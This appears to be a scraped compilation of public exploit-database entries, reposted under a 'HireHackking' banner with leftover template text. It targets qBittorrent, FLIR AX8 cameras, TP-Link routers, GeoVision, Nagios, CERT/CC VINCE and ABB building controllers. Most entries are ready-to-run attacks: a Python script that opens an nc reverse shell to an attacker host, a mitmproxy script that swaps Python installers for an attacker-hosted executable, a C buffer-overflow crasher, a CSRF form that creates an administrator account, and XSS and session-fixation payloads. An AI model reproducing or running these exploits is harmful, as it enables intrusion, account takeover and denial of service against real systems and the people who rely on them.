# Exploit Title: ProConf 6.0 - Insecure Direct Object Reference (IDOR) # Date: 19/07/2018 # Exploit Author: S. M. Zia Ur Rashid, SC # Author Contact: https://www.linkedin.com/in/ziaurrashid/ # Vendor Homepage: http://proconf.org & http://myproconf.org # Version: <= 6.0 # Tested on: Windows # CVE : CVE-2018-16606 # Patched Version: 6.1 # Description: In ProConf before 6.1, an Insecure Direct Object Reference (IDOR) allows any author to view and grab all submitted papers (Title and Abstract) and their authors' personal information (Name, Email, Organization, and Position) by changing the value of Paper ID (the pid parameter). # PROOF-OF-CONCEPT Step 1: Sign In as an author for a conference & submit a paper. Youall get a paper ID. Step 2: Now go to paper details and change the value of Paper ID (param pid=xxxx) to nearest previous value to view others submitted paper & authors information. http:// <http:> [host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx
HireHackking

qBittorrent 5.0.1 - MITM RCE

HACKER · %s · %s

# Exploit Title: qBittorrent 5.0.1 MITM RCE # Date: 01/02/2025 # Exploit Author: Jordan Sharp # Vendor Homepage: https://github.com/qbittorrent/qBittorrent # Software Link: https://www.qbittorrent.org/download # Version: < 5.0.1 # Tested on: Windows 10 # CVE : CVE-2024-51774 Run the PoC on a MITM machine intercepting the host """PoC exploit for CVE-2024-51774""" from mitmproxy import http targets = [ "https://www.python.org/ftp/python/3.10.11/python-3.10.11-amd64.exe", "https://www.python.org/ftp/python/3.8.10/python-3.8.10-amd64.exe", "https://www.python.org/ftp/python/3.10.11/python-3.10.11.exe", "https://www.python.org/ftp/python/3.8.10/python-3.8.10.exe", "https://www.python.org/ftp/python/3.4.3/python-3.4.3.msi", "https://www.python.org/ftp/python/3.8.5/python-3.8.5-amd64.exe", "https://www.python.org/ftp/python/3.8.5/python-3.8.5.exe", "https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe", "https://www.python.org/ftp/python/3.8.1/python-3.8.1.exe", "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe", "https://www.python.org/ftp/python/3.7.4/python-3.7.4.exe", "https://www.python.org/ftp/python/3.6.6/python-3.6.6.exe", "https://www.python.org/ftp/python/3.12.4/python-3.12.4-amd64.exe", "https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi", "https://www.python.org/ftp/python/3.5.2/python-3.5.2.exe" ] SUBSTITUTE_URL = "http://192.168.50.2:6666/calc.exe" def request(flow: http.HTTPFlow) -> None: """ Inject any exe instead of a Python installer. """ if flow.request.pretty_url in targets: flow.request.url = SUBSTITUTE_URL
HireHackking

GeoVision GV-ASManager 6.1.1.0 - CSRF

HACKER · %s · %s

# Exploit Title: GeoVision GV-ASManager 6.1.1.0 - CSRF # Google Dork: inurl:"ASWeb/Login" # Date: 02-FEB-2025 # Exploit Author: Giorgi Dograshvili [DRAGOWN] # Vendor Homepage: https://www.geovision.com.tw/ # Software Link: https://www.geovision.com.tw/download/product/ # Version: 6.1.1.0 or less # Tested on: Windows 10 | Kali Linux # CVE : CVE-2024-56901 # PoC: https://github.com/DRAGOWN/CVE-2024-56901 A Cross-Site Request Forgery (CSRF) vulnerability in Geovision GV-ASManager web application with the version 6.1.1.0 or less that allows attackers to arbitrarily create Admin accounts via a crafted GET request method. This vulnerability is used in chain with CVE-2024-56903 for a successful CSRF attack. Requirements To perform successful attack an attacker requires: - GeoVision ASManager version 6.1.1.0 or less - Network access to the GV-ASManager web application (there are cases when there are public access) - Administrator's interaction with an open session in the browser Impact The vulnerability can be leveraged to perform the following unauthorized actions: A unauthorized account is able to: - Modify POST method request with GET by leveraging CVE-2024-56903 vulnerability. - Craft a malicious HTML page which makes changes in the application on behalf of the administrator account. - Create a new administrator account on behalf of the legit administrator account. After the successful attack, an attacker will be able to: - Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc. - Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc. - Disrupt and disconnect services such as monitoring cameras, access controls. - Clone and duplicate access control data for further attack scenarios. - Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization. The CSRF code: <html> <body> <form action="https://[TARGET]/ASWeb/bin/ASWebCommon.srf"> # Set the target <input type="hidden" name="action" value="UA&#95;SetCreateAccount" /> <input type="hidden" name="id" value="Malicious" /> # Set Username <input type="hidden" name="password" value="Youarecracked999&#33;" /> # Set Password <input type="hidden" name="email" value="Malicious&#64;geovision&#46;com&#46;tw" /> # Set Email <input type="hidden" name="level" value="2" /> # Set privilege 1-Normal user 2-Administrator <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> After a successful attack, you will get access to: - ASWeb - Access & Security Management - TAWeb - Time and Attendance Management - VMWeb - Visitor Management - ASManager - Access & Security Management software in OS
HireHackking
# Exploit Title: WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page # Date: 25-01-2024 # Exploit Author: Rasime Ekici # Vendor Homepage: www.softwareag.com # Version: 10.15.0000-0092 # Tested on: 10.15.0000-0092 # CVE : 2024-23733 Description: The /WmAdmin/,/invoke/vm.server/login login page in the Integration Server in Software AG webMethods 10.15.0 before Core Fix7 allows remote attackers to reach the administration panel,discovering server hostname and version information by sending arbitary username and blank password to the /WmAdmin/#/login/ uri Interpret the http traffic and send a dummy username with blank password on login screen and drop the request to "/admin/navigation/license" to not logged out.Thus you may able to see: -real hostname of the installed server -version info -administrative api endpoints
HireHackking

FLIR AX8 1.46.16 - Remote Command Injection

HACKER · %s · %s

# Exploit Title: FLIR AX8 1.46.16 - Remote Command Injection # Date: 8/19/2022 # Exploit Author: Samy Younsi Naqwada (https://samy.link), SC # Vendor Homepage: https://www.flir.com/ # Software Link: https://www.flir.com/products/ax8-automation/ # PoC: https://www.youtube.com/watch?v=dh0_rfAIWok # Version: 1.46.16 and under. # Tested on: FLIR AX8 version 1.46.16 (Ubuntu) # CVE : CVE-2022-37061 from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse import requests import json import urllib3 urllib3.disable_warnings() def banner(): flirLogo = """ ███████╗██╗ ██╗██████╗ ██╔════╝██║ ██║██╔══██╗ █████╗ ██║ ██║██████╔╝ ██╔══╝ ██║ ██║██╔══██╗ ██║ ███████╗██║██║ ██║ ╚═╝ ╚══════╝╚═╝╚═╝ ╚═╝ .---------------------. █████╗ ██╗ ██╗ █████╗ /--'--.------.--------/| ██╔══██╗╚██╗██╔╝██╔══██╗ |Say :) |__Ll__| [==] || ███████║ ╚███╔╝ ╚█████╔╝ |cheese!| .--. | '''' || ██╔══██║ ██╔██╗ ██╔══██╗ | |( () )| || ██║ ██║██╔╝ ██╗╚█████╔╝ | | `--` | |/ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚════╝ `-------`------`------` \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mFLIR AX8 Unauthenticated OS Command Injection\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(flirLogo)) def pingWebInterface(RHOST, RPORT): url = 'http://{}:{}/login/'.format(RHOST, RPORT) response = requests.get(url, allow_redirects=False, verify=False, timeout=60) try: if response.status_code != 200: print('[!] \033[1;91mError: FLIR AX8 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') version = soup.find('p', id='login-title').string print('[INFO] {} detected.'.format(version)) except: print('[ERROR] Can\'t grab the device version...') def execReverseShell(RHOST, RPORT, LHOST, LPORT): url = 'http://{}:{}/res.php'.format(RHOST, RPORT) payload = 'rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff'.format(LHOST, LHOST) data = 'action=alarm&id=2;{}'.format(payload) headers = { 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', } try: print('[INFO] Executing reverse shell...') response = requests.post(url, headers=headers, data=data, allow_redirects=False, verify=False) print('Reverse shell successfully executed. {}:{}'.format(LHOST, LPORT)) return except Exception as e: print('Reverse shell failed. Make sure the FLIR AX8 device can reach the host {}:{}').format(LHOST, LPORT) return False def main(): banner() parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on FLIR AX8 devices.', add_help=False) parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (FLIR AX8 device)", type=str, required=True) parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True) parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) args = parser.parse_args() pingWebInterface(args.RHOST, args.RPORT) execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) if __name__ == "__main__": main()
HireHackking
* Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption * Date: 11/24/2024 * Exploit Author: Mohamed Maatallah * Vendor Homepage: https://www.tp-link.com * Version: TT_V6.2.1021 (VN020-F3v(T)) * Tested on: VN020-F3v(T) Router (Hardware Version 1.0) * CVE: CVE-2024-12344 * Category: Remote * Description: * A critical buffer overflow and memory corruption vulnerability was discovered in TP-Link VN020-F3v(T) router's FTP server implementation. The vulnerability stems from improper input validation of the USER command, allowing unauthenticated attackers to trigger various failure modes through payload size manipulation: * 1. 1100 bytes - Delayed crash (5-10 seconds) * 2. 1450 bytes - Immediate crash * 3. >1450 bytes - Undefined behavior/state corruption * Proof of Concept: (attached full c file) * Compilation Instructions (Visual Studio): * --------------------------------------- * 1. Open Visual Studio * 2. Create a new C Console Application * 3. Add these additional dependencies to project settings: * - ws2_32.lib * - iphlpapi.lib * 4. Ensure Windows SDK is installed * 5. Set Platform Toolset to latest v143 or v142 * 6. Compile in Release or Debug mode * * Disclaimer: * ---------- * This proof of concept is for educational and research purposes only. * Unauthorized testing without explicit permission is unethical and illegal. */ #define _CRT_SECURE_NO_WARNINGS #include <stdio.h> #include <stdlib.h> #include <winsock2.h> #include <ws2tcpip.h> #include <stdint.h> #include <windows.h> #include <iphlpapi.h> #include <icmpapi.h> #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "iphlpapi.lib") // Target configuration - MODIFY BEFORE TESTING #define DEST_IP "192.168.1.1" // IP of target FTP server #define DEST_PORT 21 // Standard FTP port #define PING_TIMEOUT_MS 1000 // Network timeout #define MAX_PING_RETRIES 5 // Connectivity check attempts // 1450: Instant // 1100: Delayed #define CRASH_STRING_LENGTH 1450 // Exact number of 'A's triggering instantcrash #define TOTAL_PAYLOAD_LENGTH (CRASH_STRING_LENGTH + 5 + 2) // USER + As + \r\n typedef struct { HANDLE icmp_handle; IPAddr target_addr; LPVOID reply_buffer; DWORD reply_size; } ping_context_t; void log_msg(const char* prefix, const char* msg) { SYSTEMTIME st; GetLocalTime(&st); printf("[%02d:%02d:%02d] %s %s\n", st.wHour, st.wMinute, st.wSecond, prefix, msg); } void hexdump(const char* desc, const void* addr, const int len) { int i; unsigned char buff[17]; const unsigned char* pc = (const unsigned char*)addr; if (desc != NULL) printf("%s:\n", desc); for (i = 0; i < len; i++) { if ((i % 16) == 0) { if (i != 0) printf(" %s\n", buff); printf(" %04x ", i); } printf(" %02x", pc[i]); if ((pc[i] < 0x20) || (pc[i] > 0x7e)) buff[i % 16] = '.'; else buff[i % 16] = pc[i]; buff[(i % 16) + 1] = '\0'; } while ((i % 16) != 0) { printf(" "); i++; } printf(" %s\n", buff); } BOOL check_connectivity(ping_context_t* ctx) { char send_buf[32] = { 0 }; return IcmpSendEcho(ctx->icmp_handle, ctx->target_addr, send_buf, sizeof(send_buf), NULL, ctx->reply_buffer, ctx->reply_size, PING_TIMEOUT_MS) > 0; } char* generate_exact_crash_payload() { char* payload = (char*)malloc(TOTAL_PAYLOAD_LENGTH + 1); // +1 for null terminator if (!payload) { log_msg("[-]", "Failed to allocate payload memory"); return NULL; } // Construct the exact payload that causes crash strcpy(payload, "USER "); // 5 bytes memset(payload + 5, 'A', CRASH_STRING_LENGTH); // 1450 'A's memcpy(payload + 5 + CRASH_STRING_LENGTH, "\r\n", 2); // 2 bytes payload[TOTAL_PAYLOAD_LENGTH] = '\0'; char debug_msg[100]; snprintf(debug_msg, sizeof(debug_msg), "Generated payload of length %d ('A's + 5 byte prefix + 2 byte suffix)", TOTAL_PAYLOAD_LENGTH); log_msg("[*]", debug_msg); return payload; } BOOL send_crash_payload(const char* target_ip, uint16_t target_port) { WSADATA wsa; SOCKET sock = INVALID_SOCKET; struct sockaddr_in server; char server_reply[2048]; int recv_size; ping_context_t ping_ctx = { 0 }; BOOL success = FALSE; // Initialize Winsock if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) { log_msg("[-]", "Winsock initialization failed"); return FALSE; } // Setup ICMP for connectivity monitoring ping_ctx.icmp_handle = IcmpCreateFile(); ping_ctx.reply_size = sizeof(ICMP_ECHO_REPLY) + 32; ping_ctx.reply_buffer = malloc(ping_ctx.reply_size); inet_pton(AF_INET, target_ip, &ping_ctx.target_addr); // Create socket sock = socket(AF_INET, SOCK_STREAM, 0); if (sock == INVALID_SOCKET) { log_msg("[-]", "Socket creation failed"); goto cleanup; } // Setup server address server.sin_family = AF_INET; server.sin_port = htons(target_port); inet_pton(AF_INET, target_ip, &server.sin_addr); // Connect to FTP server log_msg("[*]", "Connecting to target FTP server..."); if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0) { log_msg("[-]", "Connection failed"); goto cleanup; } log_msg("[+]", "Connected successfully"); // Verify initial connectivity if (!check_connectivity(&ping_ctx)) { log_msg("[-]", "No initial connectivity to target"); goto cleanup; } // Receive banner if ((recv_size = recv(sock, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR) { log_msg("[-]", "Failed to receive banner"); goto cleanup; } server_reply[recv_size] = '\0'; log_msg("[*]", server_reply); // Generate and send the exact crash payload char* payload = generate_exact_crash_payload(); if (!payload) { goto cleanup; } log_msg("[*]", "Sending crash payload..."); hexdump("Payload hex dump (first 32 bytes)", payload, 32); if (send(sock, payload, TOTAL_PAYLOAD_LENGTH, 0) < 0) { log_msg("[-]", "Failed to send payload"); free(payload); goto cleanup; } free(payload); log_msg("[+]", "Payload sent successfully"); // Monitor for crash log_msg("[*]", "Monitoring target status..."); Sleep(1000); // Wait a bit for crash to take effect int failed_pings = 0; for (int i = 0; i < MAX_PING_RETRIES; i++) { if (!check_connectivity(&ping_ctx)) { failed_pings++; if (failed_pings >= 3) { log_msg("[+]", "Target crash confirmed!"); success = TRUE; goto cleanup; } } Sleep(500); } log_msg("[-]", "Target appears to still be responsive"); cleanup: if (sock != INVALID_SOCKET) { closesocket(sock); } if (ping_ctx.icmp_handle != INVALID_HANDLE_VALUE) { IcmpCloseHandle(ping_ctx.icmp_handle); } if (ping_ctx.reply_buffer) { free(ping_ctx.reply_buffer); } WSACleanup(); return success; } int main(void) { printf("\nTP-Link VN020 FTP Memory Corruption PoC\n"); printf("---------------------------------------\n"); printf("Target: %s:%d\n", DEST_IP, DEST_PORT); if (send_crash_payload(DEST_IP, DEST_PORT)) { printf("\nExploit successful - target crashed\n"); } else { printf("\nExploit failed - target may be patched\n"); } return 0; }
HireHackking

Nagios Log Server 2024R1.3.1 - API Key Exposure

HACKER · %s · %s

# Exploit Title: Nagios Log Server 2024R1.3.1 - API Key Exposure # Date: 2025-04-08 # Exploit Author: Seth Kraft, Alex Tisdale # Vendor Homepage: https://www.nagios.com/ # Vendor Changelog: https://www.nagios.com/changelog/#log-server # Software Link: https://www.nagios.com/products/log-server/download/ # Version: Nagios Log Server 2024R1.3.1 and below # Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04) # CWE: CWE-200, CWE-284, CWE-522 # CVSS: 9.8 (CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) # Type: Information Disclosure, Improper Access Control # Exploit Risk: Critical ## Disclosure For ethical research purposes only. Do not target systems without proper authorization. ## Description An API-level vulnerability in Nagios Log Server 2024R1.3.1 allows any user with a valid API token to retrieve a full list of user accounts along with their plaintext API keys, including administrator credentials. This flaw enables user enumeration, privilege escalation, and full system compromise via unauthorized use of exposed tokens. ## PoC ### Step 1: Access the vulnerable endpoint ``` curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>" ``` ## Sample Response ```json [ { "name": "devadmin", "username": "devadmin", "email": "test@example.com", "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de", "auth_type": "admin", ... } ] ```
HireHackking

CMU CERT/CC VINCE 2.0.6 - Stored XSS

HACKER · %s · %s

# Exploit Tile: CMU CERT/CC VINCE 2.0.6 - Stored XSS # Vendor: Carnegie Mellon University # Product web page: https://www.kb.cert.org/vince/ # Affected version: <=2.0.6 Summary: VINCE is the Vulnerability Information and Coordination Environment developed and used by the CERT Coordination Center to improve coordinated vulnerability disclosure. VINCE is a Python-based web platform. Desc: The framework suffers from an authenticated stored cross-site scripting vulnerability. Input passed to the 'content' POST parameter is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site. Tested on: nginx/1.20.0 Django 3.2.17 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5917 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5917.php 13.01.2023 -- $ curl -k https://kb.cert.org/vince/comm/post/CASE_NO \ > -H "Cookie: sessionid=xxxx" \ > -d 'content="><marquee>ZSL</marquee>%0A%0A&csrfmiddlewaretoken=xxx&paginate_by=10&reply_to=xxxxx'
HireHackking

ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning

HACKER · %s · %s

# ABB Cylon FLXeon 9.3.4 (wsConnect.js) WebSocket Command Spawning PoC # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) CBX Series (FLX Series) CBT Series CBV Series Firmware: <=9.3.4 # Advisory ID: ZSL-2025-5913 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5913.php # CVE ID: CVE-2024-48849 # CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48849 Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ building management solutions. ABB BACnet controllers are designed for intelligent control of HVAC equipment such as central plant, boilers, chillers, cooling towers, heat pump systems, air handling units (constant volume, variable air volume, and multi-zone), rooftop units, electrical systems such as lighting control, variable frequency drives and metering. The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented connectivity and open integration for your building automation systems. It's scalable, and modular, allowing you to control a diverse range of HVAC functions. Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to an unauthenticated WebSocket implementation that allows an attacker to execute the tcpdump command. This command captures network traffic and filters it on serial ports 4855 and 4851, which are relevant to the device's services. The vulnerability can be exploited in a loop to start multiple instances of tcpdump, leading to resource exhaustion, denial of service (DoS) conditions, and potential data exfiltration. The lack of authentication on the WebSocket interface allows unauthorized users to continuously spawn new tcpdump processes, amplifying the attack's impact. Tested on: Linux Kernel 5.4.27 Linux Kernel 4.15.13 NodeJS/8.4.0 Express Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience 21.04.2024 EOC cat << "EOF" P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ EOF echo -ne "\n-------------------------------------------------------" echo -ne "\nABB Cylon BACnet Building Controllers WebSocket Exploit" echo -ne "\n-------------------------------------------------------\n" if [ "$#" -ne 1 ]; then echo -ne "\nUsage: $0 [ipaddr]\n\n" exit fi IP=$1 TARGET="wss://$IP:443/ws" PID=$! echo "$PID" STOP_SERVICE=`echo -e \ "\x7B\x22\x74\x61\x72\x67\x65\x74\x22\x3A\x22\x74\x63"\ "\x70\x64\x75\x6D\x70\x22\x2C\x22\x6D\x65\x74\x68\x6F"\ "\x64\x22\x3A\x22\x73\x74\x6F\x70\x22\x2C\x22\x70\x61"\ "\x72\x61\x6D\x73\x22\x3A\x7B\x22\x74\x79\x70\x65\x22"\ "\x3A\x22\x73\x6D\x61\x72\x74\x52\x6F\x75\x74\x65\x72"\ "\x22\x2C\x22\x6D\x69\x6E\x75\x74\x65\x73\x22\x3A\x31"\ "\x2C\x22\x73\x69\x7A\x65\x4B\x62\x22\x3A\x31\x30\x7D"\ "\x7D"` #stop tcpdump smartRouter capture START_SERVICE=`echo -e \ "\x7B\x22\x74\x61\x72\x67\x65\x74\x22\x3A\x22\x74\x63"\ "\x70\x64\x75\x6D\x70\x22\x2C\x22\x6D\x65\x74\x68\x6F"\ "\x64\x22\x3A\x22\x73\x74\x61\x72\x74\x22\x2C\x22\x70"\ "\x61\x72\x61\x6D\x73\x22\x3A\x7B\x22\x74\x79\x70\x65"\ "\x22\x3A\x22\x73\x6D\x61\x72\x74\x52\x6F\x75\x74\x65"\ "\x72\x22\x2C\x22\x6D\x69\x6E\x75\x74\x65\x73\x22\x3A"\ "\x31\x2C\x22\x73\x69\x7A\x65\x4B\x62\x22\x3A\x31\x30"\ "\x7D\x7D"` #start tcpdump smartRouter capture echo -e "\n[+] Sending JSONRPC => $START_SERVICE\n" sleep 1 echo "$START_SERVICE"| websocat --insecure --one-message --buffer-size 251 --no-close "$TARGET" -v sleep 2 echo -e "\n[+] Sending JSONRPC => $STOP_SERVICE\n" sleep 1 echo "$STOP_SERVICE"| websocat -k -1 -B 251 -n "$TARGET" -v echo -e "\n[*] Done" << "LOG" $ cd /usr/local/aam/var; journalctl -r --no-hostname --no-pager >log.txt; split -n 4 log.txt $ cat /usr/local/aam/var/xaa $ cat /usr/local/aam/var/xab $ cat /usr/local/aam/var/xac $ cat /usr/local/aam/var/xad ... #Apr 21 23:12:51 kernel: device lo left promiscuous mode #Apr 21 23:12:34 kernel: device lo entered promiscuous mode #Apr 21 23:12:34 node[196]: ws connect ... LOG
HireHackking

ABB Cylon Aspect 3.08.02 - PHP Session Fixation

HACKER · %s · %s

# Exploit title: ABB Cylon Aspect 3.08.02 PHP Session Fixation Vulnerability # Advisory ID: ZSL-2025-5916 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5916.php # CVE ID: CVE-2024-11317 # CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-11317 Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.02 Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices. Desc: The ABB Cylon Aspect BMS/BAS controller is vulnerable to session fixation, allowing an attacker to set a predefined PHPSESSID value. An attacker can leverage an unauthenticated reflected XSS vulnerability in jsonProxy.php to inject a crafted request, forcing the victim to adopt a fixated session. Tested on: GNU/Linux 3.15.10 (armv7l) GNU/Linux 3.10.0 (x86_64) GNU/Linux 2.6.32 (x86_64) Intel(R) Atom(TM) Processor E3930 @ 1.30GHz Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz PHP/7.3.11 PHP/5.6.30 PHP/5.4.16 PHP/4.4.8 PHP/5.3.3 AspectFT Automation Application Server lighttpd/1.4.32 lighttpd/1.4.18 Apache/2.2.15 (CentOS) OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) ErgoTech MIX Deployment Server 2.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ <body> <!-- Session ID in a cookie (Client-side script) OWASP Ref.: --> <form action="http://192.168.73.31/jsonProxy.php" method="GET"> <input type="hidden" name="application" value="zeroscience" /> <input type="hidden" name="query" value="<script>document.cookie="PHPSESSID=22222222225555555555111111; path=/"%0A%0Dwindow.location.href="/"</script>" /> <input type="submit" value="Fix!" /> </form> </body> </html>
HireHackking

ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE) # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) CBX Series (FLX Series) CBT Series CBV Series Firmware: <=9.3.4 Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ building management solutions. ABB BACnet controllers are designed for intelligent control of HVAC equipment such as central plant, boilers, chillers, cooling towers, heat pump systems, air handling units (constant volume, variable air volume, and multi-zone), rooftop units, electrical systems such as lighting control, variable frequency drives and metering. The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented connectivity and open integration for your building automation systems. It's scalable, and modular, allowing you to control a diverse range of HVAC functions. Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote root code execution via the /api/users/password endpoint. An attacker with valid credentials can inject arbitrary system commands by manipulating the newPassword PUT parameter. The issue arises in users.js, where the new password is hashed and improperly escaped before being passed to ChildProcess.exec() within a usermod command, allowing out of band (blind) command injection. Tested on: Linux Kernel 5.4.27 Linux Kernel 4.15.13 NodeJS/8.4.0 Express Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5912 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5912.php CVE ID: CVE-2024-48841 CVE URL: 